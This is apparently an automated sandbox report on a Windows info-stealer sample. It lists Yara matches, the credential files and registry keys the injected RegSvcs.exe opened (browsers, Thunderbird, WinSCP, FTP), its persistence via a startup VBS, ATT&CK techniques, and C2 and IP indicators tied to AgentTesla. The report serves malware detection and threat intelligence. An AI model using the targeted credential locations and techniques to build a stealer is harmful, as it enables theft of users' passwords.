                    Source: Yara match | File source: 00000003.00000002.2187480515.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: outvaunts.exe PID: 5752, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5376, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: outvaunts.exe PID: 6156, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6512, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\FTP Navigator\Ftplist.txt
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: outvaunts.exe | Binary or memory string: WIN_81
                    Source: outvaunts.exe | Binary or memory string: WIN_XP
                    Source: outvaunts.exe | Binary or memory string: WIN_XPe
                    Source: outvaunts.exe | Binary or memory string: WIN_VISTA
                    Source: outvaunts.exe | Binary or memory string: WIN_7
                    Source: outvaunts.exe | Binary or memory string: WIN_8
                    Source: outvaunts.exe, 00000005.00000002.2185271062.0000000000D05000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                    Source: Yara match | File source: 2.2.outvaunts.exe.1b30000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.outvaunts.exe.3e90000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 2.2.outvaunts.exe.1b30000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.outvaunts.exe.3e90000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000003.00000002.2184485388.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.2187439534.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.2187480515.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: outvaunts.exe PID: 5752, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5376, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: outvaunts.exe PID: 6156, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6512, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match | File source: dump.pcap, type: PCAP
                    Source: Yara match | File source: 2.2.outvaunts.exe.1b30000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.outvaunts.exe.3e90000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 2.2.outvaunts.exe.1b30000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 5.2.outvaunts.exe.3e90000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000003.00000002.2187480515.00000000027EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.2184485388.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000006.00000002.4511232795.0000000002B56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000006.00000002.4511232795.0000000002B6E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000005.00000002.2187439534.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.2187480515.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: outvaunts.exe PID: 5752, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5376, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: outvaunts.exe PID: 6156, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6512, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00E46596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00E46596
                    Source: C:\Users\user\Desktop\toIuQILmr1.exe | Code function: 0_2_00E46A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00E46A5A
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 2_2_00CC6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,2_2_00CC6596
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 2_2_00CC6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00CC6A5A
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 5_2_00CC6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,5_2_00CC6596
                    Source: C:\Users\user\AppData\Local\kinematical\outvaunts.exe | Code function: 5_2_00CC6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,5_2_00CC6A5A
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information111
                    Scripting
                    2
                    Valid Accounts
                    221
                    Windows Management Instrumentation
                    111
                    Scripting
                    1
                    Exploitation for Privilege Escalation
                    11
                    Disable or Modify Tools
                    2
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    2
                    Ingress Tool Transfer
                    1
                    Exfiltration Over Alternative Protocol
                    1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts2
                    Native API
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    1
                    Deobfuscate/Decode Files or Information
                    21
                    Input Capture
                    1
                    Account Discovery
                    Remote Desktop Protocol2
                    Data from Local System
                    1
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt2
                    Valid Accounts
                    2
                    Valid Accounts
                    21
                    Obfuscated Files or Information
                    1
                    Credentials in Registry
                    2
                    File and Directory Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    1
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron2
                    Registry Run Keys / Startup Folder
                    21
                    Access Token Manipulation
                    1
                    Software Packing
                    NTDS138
                    System Information Discovery
                    Distributed Component Object Model21
                    Input Capture
                    2
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                    Process Injection
                    1
                    DLL Side-Loading
                    LSA Secrets751
                    Security Software Discovery
                    SSH3
                    Clipboard Data
                    12
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
                    Registry Run Keys / Startup Folder
                    1
                    Masquerading
                    Cached Domain Credentials231
                    Virtualization/Sandbox Evasion
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                    Valid Accounts
                    DCSync2
                    Process Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job231
                    Virtualization/Sandbox Evasion
                    Proc Filesystem11
                    Application Window Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                    Access Token Manipulation
                    /etc/passwd and /etc/shadow1
                    System Owner/User Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron212
                    Process Injection
                    Network Sniffing1
                    System Network Configuration Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    Behavior Graph ID: 1588811 | Sample: toIuQILmr1.exe | Startdate: 11/01/2025 | Architecture: WINDOWS | Score: 100
                    • Start node: DNS/IP: ip-api.com, ftp.antoniomayol.com, antoniomayol.com; signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures
                    • toIuQILmr1.exe (started from the start node): dropped C:\Users\user\AppData\Local\...\outvaunts.exe (PE32); signature: Binary is likely a compiled AutoIt script file; started outvaunts.exe
                    • wscript.exe (started from the start node): signature: Windows Scripting host queries suspicious COM object (likely to drop second stage); started outvaunts.exe
                    • outvaunts.exe (child of toIuQILmr1.exe): dropped C:\Users\user\AppData\...\outvaunts.vbs (data); signatures: Multi AV Scanner detection for dropped file; Binary is likely a compiled AutoIt script file; Machine Learning detection for dropped file; 3 other signatures; started RegSvcs.exe
                    • outvaunts.exe (child of wscript.exe): signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process; started RegSvcs.exe
                    • RegSvcs.exe (child of the outvaunts.exe launched by toIuQILmr1.exe): DNS/IP: antoniomayol.com 162.241.62.63, ports 21, 33214, 49705, UNIFIEDLAYER-AS-1US, United States; ip-api.com 208.95.112.1, ports 49704, 49706, 80, TUT-ASUS, United States; signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                    • RegSvcs.exe (child of the outvaunts.exe launched by wscript.exe): signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)

                    Source | Detection | Scanner | Label
                    toIuQILmr1.exe | 76% | Virustotal
                    toIuQILmr1.exe | 71% | ReversingLabs | Win32.Trojan.AutoitInject
                    toIuQILmr1.exe | 100% | Joe Sandbox ML
                    Source | Detection | Scanner | Label
                    C:\Users\user\AppData\Local\kinematical\outvaunts.exe | 100% | Joe Sandbox ML
                    C:\Users\user\AppData\Local\kinematical\outvaunts.exe | 71% | ReversingLabs | Win32.Trojan.AutoitInject
                    C:\Users\user\AppData\Local\kinematical\outvaunts.exe | 76% | Virustotal
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    antoniomayol.com | 162.241.62.63 | true | false | - | high
                    ip-api.com | 208.95.112.1 | true | false | - | high
                    ftp.antoniomayol.com | unknown | unknown | false | - | high
                    Name | Malicious | Antivirus Detection | Reputation
                    http://ip-api.com/line/?fields=hosting | false | - | high
                    Name | Source | Malicious | Antivirus Detection | Reputation
                    http://ip-api.com/line/?fields=hosting& | RegSvcs.exe, 00000006.00000002.4510792192.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp | false | - | high
                    http://antoniomayol.com | RegSvcs.exe, 00000003.00000002.2187480515.00000000027EE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4511232795.0000000002B6E000.00000004.00000800.00020000.00000000.sdmp | false | - | high
                    http://ftp.antoniomayol.com | RegSvcs.exe, 00000003.00000002.2187480515.00000000027EE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4511232795.0000000002B6E000.00000004.00000800.00020000.00000000.sdmp | false | - | high
                    https://account.dyn.com/ | outvaunts.exe, 00000002.00000002.2069036182.0000000001B30000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2184485388.0000000000402000.00000040.80000000.00040000.00000000.sdmp, outvaunts.exe, 00000005.00000002.2187439534.0000000003E90000.00000004.00001000.00020000.00000000.sdmp | false | - | high
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegSvcs.exe, 00000003.00000002.2187480515.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4511232795.0000000002B1C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
                    http://ip-api.com | RegSvcs.exe, 00000003.00000002.2187480515.0000000002791000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.4511232795.0000000002B1C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                    IP | Domain | Country | ASN | ASN Name | Malicious
                    208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
                    162.241.62.63 | antoniomayol.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false
                                        Joe Sandbox version:42.0.0 Malachite
                                        Analysis ID:1588811
                                        Start date and time:2025-01-11 05:49:54 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 10m 21s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of new started processes analysed:9
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:toIuQILmr1.exe
                                        renamed because original name is a hash value
                                        Original Sample Name:0502e71249410dba419218374909428d7d53cca90c3cfe8861b7f8eae432a4b9.exe
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.expl.evad.winEXE@10/6@2/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 55
                                        • Number of non-executed functions: 278
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                        • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.45
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                    Time | Type | Description
                    05:50:48 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\outvaunts.vbs
                    23:50:48 | API Interceptor | 10926290x Sleep call for process: RegSvcs.exe modified
                    Match | Associated Sample Name / URL | Detection | Threat Name | Context
                    208.95.112.1 | LfZAz7DQzo.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
                    208.95.112.1 | Q5QrxfKnFA.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
                    208.95.112.1 | RHOqJ5BrHW.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
                    208.95.112.1 | J8V6dFanEo.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
                    208.95.112.1 | 3FjrbCZgDN.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
                    208.95.112.1 | ewYjhndHg2.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
                    208.95.112.1 | uEuTtkxAqq.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
                    208.95.112.1 | 0I9GLRSiy0.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
                    208.95.112.1 | NUGMrDcg4v.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
                    208.95.112.1 | LMxd0gpIxe.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
                    162.241.62.63 | Order 122001-220 guanzo.exe | malicious | FormBook | www.pasteleriaruth.com/meub/?6lt4=M6ATVT20FLj&ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7SITSAPpSF1hBU/JW21XLBQwE3Ox
                    Match | Associated Sample Name / URL | Detection | Threat Name | Context
                    ip-api.com | LfZAz7DQzo.exe | malicious | AgentTesla | 208.95.112.1
                    ip-api.com | Q5QrxfKnFA.exe | malicious | AgentTesla | 208.95.112.1
                    ip-api.com | RHOqJ5BrHW.exe | malicious | AgentTesla | 208.95.112.1
                    ip-api.com | J8V6dFanEo.exe | malicious | AgentTesla | 208.95.112.1
                    ip-api.com | 3FjrbCZgDN.exe | malicious | AgentTesla | 208.95.112.1
                    ip-api.com | ewYjhndHg2.exe | malicious | AgentTesla | 208.95.112.1
                    ip-api.com | uEuTtkxAqq.exe | malicious | AgentTesla | 208.95.112.1
                    ip-api.com | 0I9GLRSiy0.exe | malicious | AgentTesla | 208.95.112.1
                    ip-api.com | NUGMrDcg4v.exe | malicious | AgentTesla | 208.95.112.1
                    ip-api.com | LMxd0gpIxe.exe | malicious | AgentTesla | 208.95.112.1
                    Match | Associated Sample Name / URL | Detection | Threat Name | Context
                    UNIFIEDLAYER-AS-1US | LfZAz7DQzo.exe | malicious | AgentTesla | 162.241.62.63
                    UNIFIEDLAYER-AS-1US | zdmZjYqz44.exe | malicious | AgentTesla | 108.179.234.136
                    UNIFIEDLAYER-AS-1US | ZeAX5i7cGB.exe | malicious | AgentTesla, PureLog Stealer | 50.87.139.143
                    UNIFIEDLAYER-AS-1US | iNFGd6bDZX.exe | malicious | AgentTesla | 192.254.225.136
                    UNIFIEDLAYER-AS-1US | RHOqJ5BrHW.exe | malicious | AgentTesla | 162.241.62.63
                    UNIFIEDLAYER-AS-1US | ru52XOQ1p7.exe | malicious | AgentTesla | 192.254.186.165
                    UNIFIEDLAYER-AS-1US | 28uMwHvbTD.exe | malicious | AgentTesla | 162.241.62.63
                    UNIFIEDLAYER-AS-1US | https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8f | malicious | HTMLPhisher
                                        • 162.241.149.91
                                        https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8fGet hashmaliciousHTMLPhisherBrowse
                                        • 162.241.149.91
                                        Bontrageroutdoors_Project_Update_202557516.pdfGet hashmaliciousUnknownBrowse
                                        • 108.179.241.236
                                        TUT-ASUSLfZAz7DQzo.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        Q5QrxfKnFA.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        RHOqJ5BrHW.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        J8V6dFanEo.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        3FjrbCZgDN.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        ewYjhndHg2.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        uEuTtkxAqq.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        0I9GLRSiy0.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        NUGMrDcg4v.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        LMxd0gpIxe.exeGet hashmaliciousAgentTeslaBrowse
                                        • 208.95.112.1
                                        No context
                                        No context
                                        Process:C:\Users\user\AppData\Local\kinematical\outvaunts.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):157558
                                        Entropy (8bit):7.885376198745657
                                        Encrypted:false
                                        SSDEEP:3072:x03XsThZf8FQpNw6OaIh/5Auxz/0b5HC3nzlbMr9otOi0fVUjP5:+3cThd8qpNw6MhxPxz/GHC35MrA30ijx
                                        MD5:9959CFF26891326E51CD32D14824413E
                                        SHA1:BB05AB1A0338183E892FC48B26567127EFF8744F
                                        SHA-256:EA37FEB15778A8EBEE55CF94D8E7DCCED0EC2813AD1B8B48EB72D28625538865
                                        SHA-512:F8CC27113B351BA778C8CACB58FC9D629191B6AE0D8D3D837FBDCF3EB316CAA8E42E8D833651CFC485EF63D150C6AF22ACAE10E4FA893A859C082B95FAD35FD1
                                        Malicious:false
                                        Reputation:low
